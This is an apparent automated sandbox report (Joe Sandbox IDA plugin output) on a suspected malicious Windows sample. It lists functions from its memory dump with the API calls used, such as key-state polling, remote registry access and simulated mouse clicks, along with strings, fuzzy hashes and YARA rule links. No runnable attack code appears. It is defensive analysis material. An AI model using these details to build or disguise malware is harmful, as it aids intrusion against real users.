Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416248
_memmove.LIBCMT ref: 004162E4
_memset.LIBCMT ref: 00416308

Strings

3cA, xrefs: 004162AF
ERCP, xrefs: 004161B3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cA$ERCP
API String ID: 2532777613-1471582817
Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59

Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B

Strings

0, xrefs: 004627B5

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B

Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

ListBox, xrefs: 00458ED3
ComboBox, xrefs: 00458E9E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 3c436a4330a17279aeb7abfb2aba741a6c24e26a56e1fd0586ee6394ac518e92
Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
Opcode Fuzzy Hash: 3c436a4330a17279aeb7abfb2aba741a6c24e26a56e1fd0586ee6394ac518e92
Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28

Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
LoadLibraryW.KERNEL32(?), ref: 00486468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
DestroyWindow.USER32(?), ref: 00486485

Strings

SysAnimate32, xrefs: 0048643C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768

Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
GetStdHandle.KERNEL32(0000000C), ref: 00466E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B

Strings

nul, xrefs: 00466E36

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A

Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00466E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06

Strings

nul, xrefs: 00466F01

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A

Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
__swprintf.LIBCMT ref: 0046ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF

Strings

%lu, xrefs: 0046ACBB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25

Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1

Strings

@F, xrefs: 0046119D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @F
API String ID: 2875609808-2781531706
Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A

Function 00B93FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B93F73,00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002), ref: 00B93FE2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B93FF5
FreeLibrary.KERNEL32(00000000,?,?,?,00B93F73,00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000), ref: 00B94018

Strings

mscoree.dll, xrefs: 00B93FDB
CorExitProcess, xrefs: 00B93FED

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e92948c3f2568b5f310b85d147fe84f8c7bd2e59ca11c1427deced01e9f30af7
Instruction ID: 841f0de2569f81349762e3970c42a7853f13debcd07c9a3b7355c7c62cfdd036
Opcode Fuzzy Hash: e92948c3f2568b5f310b85d147fe84f8c7bd2e59ca11c1427deced01e9f30af7
Instruction Fuzzy Hash: ADF04F30A54218BBCF119F94DD0ABAEBFF5EB05751F0040A5F805A3160DF759A45CBD1

Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
CloseHandle.KERNEL32(?), ref: 0047EDEB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49

Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
RegCloseKey.ADVAPI32(?,?), ref: 004801AF
RegCloseKey.ADVAPI32(00000000), ref: 004801BC

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56

Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 275178c4eb982dd088ec01f3bf93205d68bc615ff41be191cb77d3319cfa7593
Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
Opcode Fuzzy Hash: 275178c4eb982dd088ec01f3bf93205d68bc615ff41be191cb77d3319cfa7593
Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55

Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A

Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00402357
ScreenToClient.USER32(004C57B0,?), ref: 00402374
GetAsyncKeyState.USER32(00000001), ref: 00402399
GetAsyncKeyState.USER32(00000002), ref: 004023A7

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95

Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
TranslateMessage.USER32(?), ref: 0045645C
DispatchMessageW.USER32(?), ref: 00456466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D

Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00458A30
PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
